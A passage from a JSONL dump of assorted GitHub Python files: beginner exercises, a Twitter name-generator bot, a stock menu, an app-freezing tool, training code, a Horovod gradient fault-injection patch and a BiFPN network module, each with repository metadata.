short:\r\n            short = len(word)\r\n    return short\r\n# returns the length of the shortest word in the string\r\n","repo_name":"aleks-hat/Python-Basics","sub_path":"CW_ShortestWord.py","file_name":"CW_ShortestWord.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2327545406","text":"#from credentials import *\nfrom os import environ\nimport datetime\nfrom time import sleep\nimport tweepy\nimport rnn_naruto\nimport sys\n\n\nINTERVAL = 60 * 60 * 6 # tweet every 6 hours\n\n# auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n# auth.set_access_token(access_token, access_token_secret)\nauth = tweepy.OAuthHandler(environ['CONSUMER_KEY'],\n                           environ['CONSUMER_SECRET'])\nauth.set_access_token(environ['ACCESS_TOKEN'],\n                      environ['ACCESS_TOKEN_SECRET'])\napi = tweepy.API(auth)\n\nmodel = rnn_naruto.fit_model() # rnn\n\n\ndef generate_name_for_tweet():\n    names = rnn_naruto.get_names(model)\n    return names\n\n\ndef tweets():\n    names = generate_name_for_tweet()\n    for i in range(4):\n        try:\n            print('new tweet')\n            api.update_status('Generated name of the RNN: '+names[i])\n            sleep(30)\n        except tweepy.TweepError as e:\n            print(e.reason)\n        except StopIteration:\n            break\n\n\ndef search_tweet_print():\n    for tweet in tweepy.Cursor(api.search, q='#naruto').items(10):\n        print('Tweet by: @' + tweet.user.screen_name)\n\n\ndef search_tweet_retweet():\n    for tweet in tweepy.Cursor(api.search, q='#naruto').items(4):\n        try:\n            print('new retweet')\n            tweet.retweet()\n            sleep(30)\n        except 
tweepy.TweepError as e:\n            print(e.reason)\n        except StopIteration:\n            break\n\n\ndef bot_run():\n    print('bot running')\n    while True:\n        tweets()\n        # search_tweet_retweet()\n        sleep(INTERVAL)\n\n\nbot_run()\n","repo_name":"andraderaul/naruto-name-generator","sub_path":"twitter_bot.py","file_name":"twitter_bot.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"9818700385","text":"def obtener_data():\r\n    \r\n    lis = []\r\n    \r\n    f = open(file=\"platos.txt\", encoding=\"utf8\", mode=\"r\",newline=\"\\n\")\r\n    \r\n    for linea in f:\r\n        linea = linea.strip(\"\\r\\n\")\r\n        lista = linea.split(\",\")\r\n        lis.append(lista)\r\n    return lis\r\n\r\ndef obtener_stock():\r\n    \r\n    stock = []\r\n    \r\n    f = open(file=\"stock.txt\", encoding=\"utf8\", mode=\"r\",newline=\"\\n\")\r\n    \r\n    for linea in f:\r\n        linea = linea.strip(\"\\r\\n\")\r\n        lista = linea.split(\",\")\r\n        stock.append(lista)\r\n\r\n    return stock\r\n    \r\ndef mod_stock(stock):\r\n    ing = []\r\n    for item in stock:\r\n        print(f\"{item[0]} - {item[1]}\")\r\n        ing.append(item[0])\r\n    \r\n    user = input(\"Enter which stock item you want to modify: \")\r\n    while user not in ing:\r\n        user = input(\"Enter an existing stock item: \")\r\n    \r\n    cant = input(\"Enter the new quantity: \")\r\n    \r\n\r\n    \r\n    with open(file=\"stock.txt\", encoding=\"utf8\", mode=\"w\",newline=\"\\n\") as f:\r\n        for item in stock:\r\n            if item[0] == user:\r\n                item[1] = cant\r\n            f.write(f\"{item[0]},{item[1]}\\n\")\r\n    \r\ndef nuevo_plato(data):\r\n    pass\r\n\r\ndef listar_negativos(data):\r\n    pass\r\n\r\ndef menu():\r\n    print(\"\"\"\r\n    1- Modify stock\r\n    2- Add a new dish\r\n    3- List negative stocks\r\n    4- Exit\r\n    \"\"\")\r\n    \r\ndef main():\r\n    \r\n    data = obtener_data()\r\n    stock = obtener_stock()\r\n    menu()\r\n    user = int(input(\"Enter an option: \"))\r\n    while user != 4:\r\n        if user == 1:\r\n            mod_stock(stock)\r\n            menu()\r\n            user = int(input(\"Enter an option: \"))\r\n        elif user == 2:\r\n            nuevo_plato(data)\r\n            menu()\r\n            user = int(input(\"Enter an option: \"))\r\n        elif user == 3:\r\n            listar_negativos(stock)\r\n            menu()\r\n            user = int(input(\"Enter an option: \"))\r\n\r\nmain()","repo_name":"GonzaloOesterheld/Algoritmos_y_Programacion_I","sub_path":"anterior.py","file_name":"anterior.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73765836329","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 30 17:25:17 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n#\tPlease write a program which prints all permutations of [1,2,3]\r\nfrom itertools import permutations\r\n\r\npermtn= permutations([1,2,3])\r\n\r\nfor i in permtn:\r\n    print(i)","repo_name":"dasari-mohana-zz/Python_Assignments","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603180649","text":"# 100/100\r\n\r\nn = int(input())\r\nmatriz, colunas = [[0]*n]*n, [0]*n\r\nlinha, indiceL, coluna, indiceC = 0, 0, 0, 0\r\n\r\nfor k in range(n):\r\n    matriz[k] = list(map(int, input().split()))\r\n\r\n    # track the largest sum and the row index\r\n    if sum(matriz[k]) > linha:\r\n        linha, indiceL = sum(matriz[k]), k\r\n\r\n    for j in range(n):\r\n        colunas[j] += matriz[k][j]\r\n\r\n        # track the largest sum and the column index\r\n        if colunas[j] > 
coluna:\r\n            coluna, indiceC = colunas[j], j\r\n\r\nprint((coluna+linha) - (2 * matriz[indiceL][indiceC]))","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"NepsAcademy/torre.py","file_name":"torre.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30484025464","text":"\n\nimport json\nimport os\nimport shutil\nimport sys\nfrom typing import Union\nfrom .gui import Chromium\nfrom .converter import Flask\n\nclass AltJSON:\n    def __init__(self, **kwds):\n        for k in kwds.keys():\n            self.__setattr__(k, kwds[k])\n\n    def as_json(self):\n        return vars(self)\n\ndef create_debug_app(config: Union[dict, AltJSON]):\n    if isinstance(config, AltJSON):\n        config = config.as_json()\n    f = Flask(config)\n    f.run_server()\n    c = Chromium(f)\n    c.run()\n\ndef freeze(input_file, output, config:dict):\n    print(\"Freezing your app...\")\n    print(\"Creating App Container...\")\n    f = Flask(config)\n    shutil.copytree(os.path.dirname(os.path.abspath(__name__+\".py\")), output)\n    print(\"Collecting Positron Distutils...\")\n    if sys.platform != \"win32\":\n        os.system(\"python3 -m pip install git+https://github.com/cordtech32/positron --target=posi_modules\")\n    else:\n        os.system(\"pip install git+https://github.com/cordtech32/positron --target=posi_modules\")\n    print(\"Reading Metadata...\")\n    with open(\"package.json\") as js:\n        pack = json.load(js)\n\n    with open(input_file) as f:\n        app = f.read()\n    \n    print(\"Creating Project...\")\n    \n    with open(output+f\"/{pack['entrypoint']}.py\",\"w\") as f:\n        f.write(app)\n\n    if sys.platform != \"win32\":\n        with open(output+\"/positron.sh\", \"w\") as f:\n            f.write(f\"\"\"\n            #!/bin/bash\n            python3 positron.py\n            \"\"\")\n\n        with open(output+\"/positron.py\",\"w\") as f:\n            f.write(f\"\"\"\nfrom {pack['entrypoint']} import app\nfrom posi_modules.positron import create_debug_app, AltJSON\n\nstruct = AltJSON(flask_app=app, flask_address=\"{pack['flask_host']}\", name=\"{pack['name']}\")\n\ncreate_debug_app(struct)\n        \"\"\")\n    else:\n        with open(output+\"/positron.cmd\", \"w\") as f:\n            f.write(f\"\"\"\n            py positron.py\n            \"\"\")\n\n\n        with open(output+\"/positron.py\",\"w\") as f:\n            f.write(f\"\"\"\nfrom {pack['entrypoint']} import app\nfrom posi_modules.positron import create_debug_app, AltJSON\n\nstruct = AltJSON(flask_app=app, flask_address=\"{pack['flask_host']}\", name=\"{pack['name']}\")\n\ncreate_debug_app(struct)\n        \"\"\")\n\n    print(\"Positron Distributable is now created!\")\n    print(\"Happy Hacking :)\")\n\n    ","repo_name":"CordTech32/Positron","sub_path":"positron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29748975007","text":"# -*- coding: utf-8 -*-\r\n# Copyright © 2019 tao.hu \r\n\r\nfrom __future__ import print_function, absolute_import\r\n\r\nimport time\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom template.utils.meters import AverageMeter\r\n\r\n\r\nclass BaseTrainer(object):\r\n    def __init__(self, cfg, model):\r\n        super(BaseTrainer, self).__init__()\r\n        self.cfg = cfg\r\n        self.model = model\r\n\r\n    def train(self, epoch, data_loader, optimizer, print_freq=10):\r\n        self.model.train()\r\n\r\n        batch_time = AverageMeter()\r\n        data_time = AverageMeter()\r\n        losses = AverageMeter()\r\n\r\n        end = time.time()\r\n        for i, inputs in enumerate(data_loader):\r\n            data_time.update(time.time() - end)\r\n\r\n            inputs = 
self._parse_data(inputs)\r\n loss = self._forward(inputs)\r\n losses.update(loss.item())\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n if self.cfg.TRAIN.GRAD.Grad_clip:\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.cfg.TRAIN.GRAD.Max_grad)\r\n optimizer.step()\r\n\r\n batch_time.update(time.time() - end)\r\n end = time.time()\r\n\r\n if (i + 1) % print_freq == 0:\r\n print('Epoch: [{}][{}/{}]\\t'\r\n 'Time {:.3f} ({:.3f})\\t'\r\n 'Data {:.3f} ({:.3f})\\t'\r\n 'Loss {:.3f} ({:.3f})\\t'\r\n .format(epoch, i + 1, len(data_loader),\r\n batch_time.val, batch_time.avg,\r\n data_time.val, data_time.avg,\r\n losses.val, losses.avg))\r\n\r\n def _parse_data(self, inputs):\r\n raise NotImplementedError\r\n\r\n def _forward(self, inputs):\r\n raise NotImplementedError\r\n\r\n\r\nclass ScoreTrainer(BaseTrainer):\r\n def _parse_data(self, inputs):\r\n inputs['exp_data'] = Variable(inputs['patch_seqs']).cuda(non_blocking=True)\r\n return inputs\r\n\r\n def _forward(self, inputs):\r\n loss = self.model(inputs)\r\n loss = torch.sum(loss) / (loss.size(0))\r\n return loss\r\n\r\n","repo_name":"ecart18/pytorch-template","sub_path":"template/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"236113382","text":"import Prog_LinkedListUtil as util\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, value):\n newNode = Node(value)\n newNode.next = self.head\n self.head = newNode\n\n def printList(self):\n curr = self.head\n\n while curr:\n print(curr.value, end=\" \")\n curr = curr.next\n print()\n\n def reverseList(self):\n curr = self.head\n prev = None\n\n while curr:\n future = curr.next\n curr.next = prev\n prev = curr\n curr = future\n self.head = prev\n\n def reverse(self, head):\n curr = head\n prev = None\n\n while curr:\n future = curr.next\n curr.next = prev\n prev = curr\n curr = future\n # head = prev\n # return head\n return prev\n\n\n'''\ndef getNodes():\n \"\"\"Build custom value linked list node\"\"\"\n nodes = []\n n = int(input(\"Please enter the size of linked list \\n\"))\n nodes[:n] = []\n # nodes[:n:-1] = []\n i = 1\n\n while i <= n:\n print(f\"Please enter {i} node value: \")\n x = int(input())\n nodes.append(x)\n # nodes[-1*i] = x\n i = i + 1\n # Reverse list or use nodes.insert(0, x) to insert at first position which shifts the nodes towards its right\n reversenodes = nodes[::-1]\n \"\"\" print(nodes)\n print(reversenodes) \"\"\"\n return reversenodes\n'''\n\nif __name__ == '__main__':\n \"\"\"Main method\"\"\"\n # nodes = getNodes()\n nodes = util.getNodes()\n\n ll = LinkedList()\n\n for node in nodes:\n ll.push(node)\n\n ll.printList()\n # ll.reverseList()\n ll.head = ll.reverse(ll.head)\n ll.printList()\n","repo_name":"solouniverse/Python","sub_path":"DS/LinkedList/Prog_ReverseList.py","file_name":"Prog_ReverseList.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14054689111","text":"from models import db, Product\nimport setup\n\napp = setup.create_app()\n\nitems = [\n {\n 'name': 'Product 1',\n 'slug': 'product-1',\n 'image': 'apple.png',\n 'price': 1\n },\n {\n 'name': 'Product 2',\n 'slug': 'product-2',\n 'image': 'banana.png',\n 'price': 2\n },\n {\n 'name': 'Product 3',\n 'slug': 
'product-3',\n        'image': 'coffee.png',\n        'price': 3\n    },\n    {\n        'name': 'Product 4',\n        'slug': 'product-4',\n        'image': 'rubber_duck.png',\n        'price': 4\n    },\n    {\n        'name': 'Product 5',\n        'slug': 'product-5',\n        'image': 'tomato.png',\n        'price': 1\n    },\n    {\n        'name': 'Product 6',\n        'slug': 'product-6',\n        'image': 'Fidget_spinner_in_blue.png',\n        'price': 3\n    },\n]\n\nfor item in items:\n\n    record = Product.query.filter_by(slug=item['slug']).first()\n\n    if record is None:\n\n        print(\"Adding product \" + item['slug'] + \"\\n\")\n\n        record = Product()\n        record.name = item['name']\n        record.slug = item['slug']\n        record.image = item['image']\n        record.price = item['price']\n\n        db.session.add(record)\n        db.session.commit()\n    else:\n        print(\"product \" + item['slug'] + \" has already been added ...... Skipping \\n\")\n\n\n\n\n","repo_name":"gianpaoloriva/devops_course","sub_path":"02_Microservices/Microservices-flask-mysql/product_service.git/app/add_products.py","file_name":"add_products.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41080355150","text":"def run():\n    # for contador in range(1000):\n    #     if contador % 2 != 0: #If contador divided by 2 leaves a remainder other than zero\n    #         continue #skip it: nothing below continue runs, and the loop moves on to the next iteration.\n    #     print(contador)\n    \n    # for i in range(2000):\n    #     print(i)\n    #     if i == 678: #If i reaches that value, the loop stops\n    #         break\n\n#Example iterating over a string\n    texto = input(\"Type a sentence: \")\n    for letra in texto:\n        #print(letra) If I leave it like this, it prints the first o it finds\n        if letra == \"o\": #If an \"o\" is found in the text, the loop stops\n            break\n        print(letra) # If I leave the print here, it prints up to the letter before the \"o\"\n\nif __name__ == \"__main__\":\n    run()","repo_name":"MCataS/BasicPython","sub_path":"break_continue.py","file_name":"break_continue.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10440547744","text":"from monkeypatch import monkeypatch\nimport whatreallyhappened as wrh\n\n\nimport horovod.tensorflow as hvd\nimport tensorflow as tf\nfrom horovod.tensorflow.gradient_aggregation import LocalGradientAggregationHelper\nfrom horovod.tensorflow.gradient_aggregation_eager import LocalGradientAggregationHelperEager\nfrom horovod.tensorflow.mpi_ops import rank\n\nfrom horovod._keras import _PRE_TF_2_4_0\n\n\n_rank = None\n_divisor = 1\n_act_after_layer = None\n_act_after_gradient = None\n_action = None\n\n\ndef set_params(**kwargs):\n    if kwargs['rank'] is not None:\n        global _rank\n        _rank = kwargs['rank']\n\n    if kwargs['divisor'] is not None:\n        global _divisor\n        _divisor = kwargs['divisor']\n\n    if kwargs['act_after_layer'] is not None:\n        global _act_after_layer\n        _act_after_layer = kwargs['act_after_layer']\n\n    if kwargs['act_after_gradient'] is not None:\n        global _act_after_gradient\n        _act_after_gradient = kwargs['act_after_gradient']\n\n    if kwargs['action'] is not None:\n        global _action\n        _action = kwargs['action']\n\n\n@monkeypatch('horovod._keras.create_distributed_optimizer')\ndef create_distributed_optimizer(keras, optimizer, name, device_dense, device_sparse,\n                                 compression, sparse_as_dense, gradient_predivide_factor,\n                                 op, backward_passes_per_step=1,\n                                 average_aggregated_gradients=False,\n                                 groups=None, *, 
create_distributed_optimizer):\n # Force the Sum operation because we'll prescale manually for the average\n op = hvd.Sum\n\n class _DistributedOptimizer(keras.optimizers.Optimizer):\n _HAS_AGGREGATE_GRAD = True\n\n def __init__(self, **kwargs):\n self._name = name or \"Distributed%s\" % self.__class__.__base__.__name__\n self._aggregated_gradients = False\n\n self._allreduce_grads = hvd._make_allreduce_grads_fn(\n self._name,\n device_dense,\n device_sparse,\n compression,\n sparse_as_dense,\n op,\n gradient_predivide_factor,\n groups)\n\n self._agg_helper = None\n if backward_passes_per_step > 1:\n if hvd._executing_eagerly():\n self._agg_helper = LocalGradientAggregationHelperEager(\n backward_passes_per_step=backward_passes_per_step,\n allreduce_func=self._allreduce_grads,\n sparse_as_dense=sparse_as_dense,\n average_aggregated_gradients=average_aggregated_gradients,\n )\n else:\n self._agg_helper = LocalGradientAggregationHelper(\n backward_passes_per_step=backward_passes_per_step,\n allreduce_func=self._allreduce_grads,\n sparse_as_dense=sparse_as_dense,\n average_aggregated_gradients=average_aggregated_gradients,\n rank=rank(),\n optimizer_type=LocalGradientAggregationHelper._OPTIMIZER_TYPE_KERAS,\n )\n\n super(self.__class__, self).__init__(**kwargs)\n\n def _compute_gradients(self, loss, var_list, grad_loss=None, tape=None):\n \"\"\"\n Compute gradients of all trainable variables.\n See Optimizer.get_gradients() for more info.\n In DistributedOptimizer, get_gradients() is overriden to also\n allreduce the gradients before returning them.\n \"\"\"\n if _PRE_TF_2_4_0:\n ret = super(self.__class__, self)._compute_gradients(\n loss, var_list, grad_loss, tape)\n return ret\n\n tape = backprop.GradientTape() if tape is None else tape\n grads_and_vars = super(self.__class__, self)._compute_gradients(\n # pylint: disable=protected-access\n loss,\n var_list,\n grad_loss,\n tape=tape)\n grads, weights = list(zip(*grads_and_vars))\n\n gradient_counter = 0\n def make_wrapper(tensor):\n layer_counter = 0\n def wrapper(inp):\n nonlocal gradient_counter, layer_counter\n\n do_action = False\n\n if _act_after_layer is not None:\n layer_counter += 1\n if _act_after_layer == layer_counter:\n if _act_after_gradient is None:\n do_action = True\n \n if _act_after_gradient is not None:\n gradient_counter += 1\n\n if gradient_counter >= _act_after_layer:\n do_action = True\n\n elif _act_after_gradient is not None:\n gradient_counter += 1\n\n if gradient_counter >= _act_after_gradient:\n do_action = True\n\n #wrh.push('create_distributed_optimizer._DistributedOptimizer._compute_gradients.wrapper')\n\n if do_action and _action == 'stop':\n #wrh.log('stop', '%r', (layer_counter, gradient_counter))\n ret = tf.zeros_like(inp)\n elif do_action and _action.startswith('stop-'):\n limit = int(_action.split('-')[1])\n if _rank >= limit:\n ret = tf.zeros_like(inp)\n else:\n ret = tf.divide(inp, limit)\n elif do_action and _action == 'abort':\n #wrh.log('abort', '%r', (layer_counter, gradient_counter))\n ret = tf.errors.AbortedError(None, None, 'act after layers')\n else:\n #wrh.log('divisor', '%r', _divisor)\n ret = tf.divide(inp, _divisor)\n\n #wrh.pop('create_distributed_optimizer._DistributedOptimizer._compute_gradients.wrapper')\n if isinstance(ret, tf.errors.OpError):\n raise ret\n else:\n return ret\n\n return tf.py_function(wrapper, (tensor,), tensor.dtype)\n \n grads = list(grads)\n for i, grad in enumerate(grads):\n grads[i] = make_wrapper(grad)\n\n allreduced_grads = self._allreduce(grads, weights)\n ret 
= list(zip(allreduced_grads, weights))\n\n return ret\n\n def get_gradients(self, loss, params):\n \"\"\"\n Compute gradients of all trainable variables.\n See Optimizer.get_gradients() for more info.\n In DistributedOptimizer, get_gradients() is overriden to also\n allreduce the gradients before returning them.\n \"\"\"\n gradients = super(self.__class__, self).get_gradients(loss, params)\n return self._allreduce(gradients, params)\n\n def _aggregate_gradients(self, grads_and_vars):\n if _PRE_TF_2_4_0:\n grads, vars = list(zip(*grads_and_vars))\n aggregated_grads = self._allreduce(grads, vars)\n return aggregated_grads\n else:\n return super(self.__class__, self)._aggregate_gradients(\n grads_and_vars)\n\n def _allreduce(self, grads, vars):\n self._aggregated_gradients = True\n\n if self._agg_helper:\n return self._agg_helper.compute_gradients(tuple(grads), tuple(vars))\n else:\n return self._allreduce_grads(grads, vars)\n\n def apply_gradients(self, *args, **kwargs):\n if self._agg_helper:\n if isinstance(args[0], zip):\n # If grad_and_vars are passed in as a zip object\n # convert to a list. This is necessary for TF2.4+\n # b/c args[0] is used in both conditional branches\n # inside _agg_helper.apply_gradients().\n args = list(args)\n args[0] = list(args[0])\n args = tuple(args)\n\n results = self._agg_helper.apply_gradients(\n lambda: super(self.__class__, self).apply_gradients(*args, **kwargs),\n self,\n *args,\n **kwargs,\n )\n else:\n results = super(self.__class__, self).apply_gradients(*args, **kwargs)\n\n if _PRE_TF_2_4_0 and not self._aggregated_gradients:\n raise Exception('`apply_gradients()` was called without a call to '\n '`get_gradients()` or `_aggregate_gradients`. If you\\'re '\n 'using TensorFlow 2.0, please specify '\n '`experimental_run_tf_function=False` in `compile()`.')\n\n return results\n\n # We dynamically create a new class that inherits from the optimizer that was passed in.\n # The goal is to override get_gradients() method with an allreduce implementation.\n # This class will have the same name as the optimizer it's wrapping, so that the saved\n # model could be easily restored without Horovod.\n cls = type(optimizer.__class__.__name__, (optimizer.__class__,),\n dict(_DistributedOptimizer.__dict__))\n\n config = optimizer.get_config()\n if not _PRE_TF_2_4_0 and issubclass(optimizer.lr.__class__,\n keras.optimizers.schedules.LearningRateSchedule):\n lr_cls = type(optimizer.lr.__class__.__name__, (optimizer.lr.__class__,),\n dict(optimizer.lr.__dict__))\n config['learning_rate'] = lr_cls.from_config(config['learning_rate']['config'])\n\n return cls.from_config(config)\n","repo_name":"player1537-playground/metem","sub_path":"imagenet/mypatch.py","file_name":"mypatch.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72271288487","text":"import logging\n\nimport changan_plugin_pytorch.nn as nnf\nimport torch\nimport torch.nn as nn\nfrom easydict import EasyDict as edict\nfrom torch.nn import ModuleDict, ModuleList, Sequential\nfrom torch.nn.quantized import FloatFunctional\n\nfrom cap.models.base_modules import ConvModule2d\nfrom cap.models.utils import _check_strides\nfrom cap.models.weight_init import normal_init\nfrom cap.registry import OBJECT_REGISTRY\nfrom cap.utils.apply_func import _as_list\nfrom cap.utils.logger import rank_zero_info\n\n__all__ = [\"BiFPN\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass MaybeApply1x1(nn.Module):\n \"\"\"Use 
conv1x1 and bn to change channel.\n\n Args:\n in_channels (int): Number of input channels.\n out_channels (int): Number of output channels.\n use_bn (bool): if use bn\n\n \"\"\"\n\n def __init__(self, in_channels, out_channels, use_bn=False):\n super(MaybeApply1x1, self).__init__()\n if in_channels == out_channels:\n return None\n self.lateral_conv = ModuleList()\n conv = nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n self.lateral_conv.append(conv)\n if use_bn:\n norm = nn.BatchNorm2d(out_channels)\n self.lateral_conv.append(norm)\n\n def forward(self, x):\n if hasattr(self, \"lateral_conv\"):\n for module in self.lateral_conv:\n x = module(x)\n return x\n else:\n return x\n\n\nclass Resize(nn.Module):\n \"\"\"The layer is used to change the feather map size or keep shape.\n\n # TODO(min.du, 1.0): move to cap/ops #\n\n Args:\n sampling (str): Sampling way, the candidate is ['down', 'up', 'keep'].\n e.g. 'down' : downsampling.\n 'up' : upsampling.\n 'keep' : keep shape unchanged.\n in_channels (int): Number of input channels.\n out_channels (int): Number of output channels.\n pooling_type (str): Pooling type, the candidate is ['max', 'avg']\n use_bn (bool): if use bn\n conv_after_downsample (bool):\n Whether 1X1 conv is placed after downsample.\n\n Returns (tensor): Resized feature map.\n\n \"\"\"\n\n def __init__(\n self,\n sampling,\n in_channels,\n out_channels,\n pooling_type=\"max\",\n use_bn=True,\n conv_after_downsample=False,\n ):\n super(Resize, self).__init__()\n assert sampling in [\"down\", \"up\", \"keep\"]\n assert pooling_type in [\"max\", \"avg\"]\n self.sampling = sampling\n self.resize_layer = ModuleList()\n if sampling == \"down\":\n if not conv_after_downsample:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n if pooling_type == \"max\":\n pooling = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n elif pooling_type == \"avg\":\n pooling = nn.AvgPool2d(kernel_size=2, stride=2, padding=0)\n self.resize_layer.append(pooling)\n if conv_after_downsample:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n else:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n if sampling == \"up\":\n self.upsampling = nnf.Interpolate(\n scale_factor=2, mode=\"bilinear\", recompute_scale_factor=True\n )\n\n def forward(self, x):\n \"\"\"Forward feature.\n\n Args:\n x (tensor): input tensor\n\n Returns (tensor): resized tensor\n\n \"\"\"\n\n for module in self.resize_layer:\n x = module(x)\n if self.sampling == \"up\":\n x = self.upsampling(x)\n return x\n\n\nclass Fusion(nn.Module):\n \"\"\"Multi-level feature fusion.\n\n Args:\n weight_len (int): Number of the input tensors\n weight_method (str): sum or fastattn\n eps (float): Avoid except 0\n\n \"\"\"\n\n def __init__(\n self, in_channels, weight_len, weight_method=\"sum\", eps=0.0001\n ):\n super(Fusion, self).__init__()\n self.weight_method = weight_method\n self.eps = eps\n self.floatF = FloatFunctional()\n if weight_method == \"fastattn\":\n self.edge_weights = nn.Parameter(\n torch.ones(weight_len, dtype=torch.float32), requires_grad=True\n )\n self.relu = nn.ReLU(inplace=True)\n\n def float_function_sum(self, x):\n x = _as_list(x)\n for i, val in enumerate(x):\n if i == 0:\n res = val\n else:\n res = self.floatF.add(res, val)\n return 
res\n\n def forward(self, x):\n x = list(x)\n if self.weight_method == \"sum\":\n return self.float_function_sum(x)\n elif self.weight_method == \"fastattn\":\n # edge_weights would be followed with relu to become positive\n relu_edge_weights = self.relu(self.edge_weights)\n weights_sum = self.float_function_sum(relu_edge_weights)\n for i in range(len(x)):\n x[i] = x[i] * relu_edge_weights[i]\n x[i] = x[i] / (weights_sum + self.eps)\n return self.float_function_sum(x)\n\n\nclass BifpnLayer(nn.Module):\n \"\"\"The basic structure of BiFPN.\n\n Args:\n fpn_config (dict): The dict is used for build the bifpn node\n out_index (list[int]): Get final output tensor list\n\n \"\"\"\n\n def __init__(self, fpn_config, out_index=None):\n\n super(BifpnLayer, self).__init__()\n self.fpn_config = fpn_config\n self.out_index = out_index\n level = fpn_config.level\n in_channels = fpn_config.in_channels\n out_channels = fpn_config.out_channels\n offset2inchannels = {\n 0: out_channels[0],\n 1: out_channels[1],\n 2: out_channels[2],\n 3: out_channels[3],\n 4: out_channels[4],\n 5: out_channels[3],\n 6: out_channels[2],\n 7: out_channels[1],\n 8: out_channels[0],\n 9: out_channels[1],\n 10: out_channels[2],\n 11: out_channels[3],\n }\n offset2out_channels = {\n 0: {\"keep\": out_channels[0]},\n 1: {\"keep\": out_channels[1]},\n 2: {\"keep\": out_channels[2]},\n 3: {\"keep\": out_channels[3]},\n 4: {\"keep\": out_channels[4], \"up\": out_channels[3]},\n 5: {\"keep\": out_channels[3], \"up\": out_channels[2]},\n 6: {\"keep\": out_channels[2], \"up\": out_channels[1]},\n 7: {\"keep\": out_channels[1], \"up\": out_channels[0]},\n 8: {\"down\": out_channels[1]},\n 9: {\"down\": out_channels[2]},\n 10: {\"down\": out_channels[3]},\n 11: {\"down\": out_channels[4]},\n }\n weight_method = fpn_config.weight_method\n self.all_nodes = ModuleDict()\n for i, fnode in enumerate(fpn_config.nodes):\n rank_zero_info(f\"fnode {i} : {fnode}\")\n node = ModuleList()\n out_ch = 0\n # resize\n for offset, sampling in zip(\n fnode[\"inputs_offsets\"], fnode[\"sampling\"]\n ):\n in_ch = (\n in_channels[offset]\n if offset < level\n else offset2inchannels[offset]\n )\n out_ch = offset2out_channels[offset][sampling]\n node.append(Resize(sampling, in_ch, out_ch))\n\n # fusion\n node.append(\n Fusion(out_ch, len(fnode[\"inputs_offsets\"]), weight_method)\n )\n\n # relu, conv, bn\n node.append(\n Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(\n out_ch,\n out_ch,\n kernel_size=3,\n stride=1,\n bias=False,\n groups=out_ch,\n padding=1,\n ),\n ConvModule2d(\n in_channels=out_ch,\n out_channels=out_ch,\n kernel_size=1,\n stride=1,\n groups=1,\n padding=0,\n norm_layer=nn.BatchNorm2d(out_ch),\n ),\n )\n )\n # append with name\n self.all_nodes[str(i)] = node\n\n def forward(self, x):\n x = list(x)\n assert len(x) == self.fpn_config.level\n for i, fnode in enumerate(self.fpn_config.nodes):\n nodes = []\n for idx, input_offset in enumerate(fnode[\"inputs_offsets\"]):\n input_node = x[input_offset]\n input_node = self.all_nodes[str(i)][idx](input_node) # resize\n nodes.append(input_node)\n # fusion\n new_node = self.all_nodes[str(i)][idx + 1](nodes)\n # activation + separable conv + bn\n new_node = self.all_nodes[str(i)][idx + 2](new_node)\n x.append(new_node)\n\n all_outs = [x[i] for i in range(-self.fpn_config.level, 0, 1)]\n if self.out_index is not None:\n return [all_outs[i] for i in self.out_index]\n return all_outs\n\n\ndef get_fpn_config(fpn_name=\"bifpn_sum\", out_channels=64):\n assert fpn_name in [\"bifpn_sum\", \"bifpn_fa\"]\n 
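For reference, the `fastattn` branch of `Fusion` above computes `out = sum(relu(w_i) * x_i) / (sum(relu(w_j)) + eps)`, a softmax-free normalized weighting of the input branches. A tiny sketch of that formula with plain tensors, assuming two equally shaped feature maps:

```python
import torch

# Two feature maps of identical shape, fused with ReLU'd learnable weights,
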